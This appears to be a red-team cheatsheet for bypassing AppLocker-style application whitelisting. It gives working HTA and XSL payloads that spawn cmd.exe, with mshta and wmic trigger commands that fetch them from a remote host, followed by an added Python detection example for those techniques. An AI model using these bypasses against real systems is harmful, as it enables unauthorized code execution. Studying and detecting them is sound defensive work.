Defense Evasion
A cheatsheet for Defense Evasion targeting techniques to bypass security measures, including application whitelisting, using HTA and XSL scripts.
Author: otter
Useful Links
- Win32 API docs
- NTAPI Undocumented Functions
- Kernel-specific structures (pick the right kernel version / update)
- DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAGE_FILE_HEADER.TimeDateStamp}{IMAGE_OPTIONAL_HEADER.SizeOfImage}/name.dll)
- All in one NTAPI documentation and references
- DotNet2JScript - A library used to encode DLLs to feed into other bypass projects.
AppLocker / Application Whitelisting Bypass
HTA
Trigger - C:\Windows\System32\mshta.exe http://10.13.37.10/cmd.hta
<html>
<head>
<!-- JScript in the head runs as soon as mshta.exe parses the document -->
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
</script>
</head>
<body>
<!-- close the (otherwise visible) HTA window once the head script has run -->
<script language="JScript">
self.close();
</script>
</body>
</html>
XSL
Trigger - wmic process get brief /format:"http://10.13.37.10/cmd.xsl"
<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell");
r.Run("cmd.exe");
]]>
</ms:script>
</stylesheet>
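Both triggers above leave the same footprint in process-creation telemetry: a script host (mshta.exe or wmic.exe) started with an HTTP(S) URL on its command line, followed by cmd.exe with that script host as its parent. The following is an added detection example, not part of the original cheatsheet; it runs three rules over constructed, Sysmon-style events (field names and hosts are assumptions, not real indicators).

```python
import re

# Constructed sample events in a simplified Sysmon Event ID 1 shape
# (Image, CommandLine, ParentImage). Hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"C:\Windows\System32\mshta.exe http://10.13.37.10/cmd.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic process get brief /format:"http://10.13.37.10/cmd.xsl"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",   # benign: built-in format
     "CommandLine": r"wmic process get brief /format:list",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
WMIC_FORMAT_URL = re.compile(r'/format:\s*"?\s*https?://', re.IGNORECASE)
SCRIPT_HOSTS = ("mshta.exe", "wmic.exe")
SHELLS = ("cmd.exe", "powershell.exe")

def basename(path):
    """Case-insensitive file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the names of the rules an event matches (empty list if none)."""
    hits = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmdline = event["CommandLine"]
    # mshta.exe fetching its HTA over HTTP(S) instead of opening a local file
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        hits.append("mshta_remote_hta")
    # wmic.exe pulling its stylesheet from a URL via /format:
    if image == "wmic.exe" and WMIC_FORMAT_URL.search(cmdline):
        hits.append("wmic_remote_xsl")
    # the shell spawned by either script host is the execution step of both payloads
    if image in SHELLS and parent in SCRIPT_HOSTS:
        hits.append("shell_child_of_script_host")
    return hits

def scan(events):
    """Map each flagged command line to the rules it matched."""
    return {e["CommandLine"]: h for e in events if (h := evaluate(e))}

if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_EVENTS).items():
        print(rules, cmd)
```

The parent/child rule is the one that survives trivial renaming of the payload file, so it is worth keeping even where URL-on-command-line rules are tuned down for noise.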